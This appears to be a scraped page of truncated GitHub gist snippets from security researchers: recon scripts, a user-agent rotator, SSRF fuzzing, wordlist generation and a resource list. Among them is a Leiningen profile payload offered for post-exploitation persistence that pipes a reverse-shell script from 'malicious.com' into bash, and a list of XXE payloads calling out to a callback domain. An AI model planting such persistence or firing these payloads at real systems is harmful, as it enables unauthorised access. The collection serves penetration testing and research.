coreygo

Privilege Escalation

• https://github.com/sagishahar/lpeworkshop

APIs

• https://any-api.com/

Tools

• https://github.com/BishopFox/GitGot
• https://www.threatcrowd.org/
• https://snyk.io/

JonathanLPoch

#!/bin/sh

DEFAULTNMAPOPTIONS="-T4 -sV -Pn --top-ports 5000 -R"
NMAPOPTIONS="$DEFAULTNMAPOPTIONS"

die() {
	printf '\033[38;5;9m%s\033[0m\n\n' "$1" >&2
	display_usage
	exit 1
}

nickpopovich

import random

header_names = ['User-Agent']

ua = ['Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.62 Safari/537.36', 'Mozilla/5.0 (Linux; Android 6.0; CAM-L21 Build/HUAWEICAM-L21; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/62.0.3202.84 Mobile Safari/537.36', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36']

if (messageIsRequest):
        request = helpers.analyzeRequest(messageInfo)
        headers = request.getHeaders()
        for header_name in header_names:

mthbernardes

;;Adding the following payload on $HOME/.lein/profiles.clj map  makes Leiningen (https://leiningen.org)
;;work as a post exploitation persistence.
{:whatever-name-you-want #=(eval 
                             (do
                               (use '[clojure.java.shell :only [sh]])
                               (require '[clojure.java.shell :as shell])
                               (shell/sh "bash" "-c" "curl https://malicious.com/revshell.sh | bash")))}

hussein98d

echo "Blind SSRF testing - append to parameters and add new parameters @hussein98d"
echo "Usage: bash script.sh domain.com http://server-callbak"
echo "This script uses https://github.com/ffuf/ffuf, https://github.com/lc/gau, https://github.com/tomnomnom/waybackurls"
if [ -z "$1" ]; then
  echo >&2 "ERROR: Domain not set"
  exit 2
fi
if [ -z "$2" ]; then
  echo >&2 "ERROR: Sever link not set"
  exit 2

gwen001

#using cewl
wordgrab() {
  url=$1
  cewl.rb -u "Mozilla/5.0 (X11; Linux; rv:74.0) Gecko/20100101 Firefox/74.0" -d 0 -m 3 https://www.$1 | tr '[:upper:]' '[:lower:]' |sort -fu | grep -v "robin wood"
}

# added min length 3
wordgrab() {
  url=$1
  tmpfile="$(date "+%s")"

olliencc

@echo off
REM °²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²°
REM °² Enumerates all files extensions                  ²°
REM °² and what opens them on Windows 10 in batch/cmd   ²°
REM °² twitter: @ollieatnccgroup                        ²°
REM °²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²°


REM ------------------------------------------------------
REM

kovetskiy

#!/bin/bash
###
### my-script — does one thing well
###
### Usage:
###   my-script <input> <output>
###
### Options:
###   <input>   Input file to read.
###   <output>  Output file to write. Use '-' for stdout.

honoki

<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y

w9w

import re

tlds_1st_lvl = [
    "aaa",
    "aarp",
    "abarth",
    "abb",
    "abbott",
    "abbvie",
    "abc",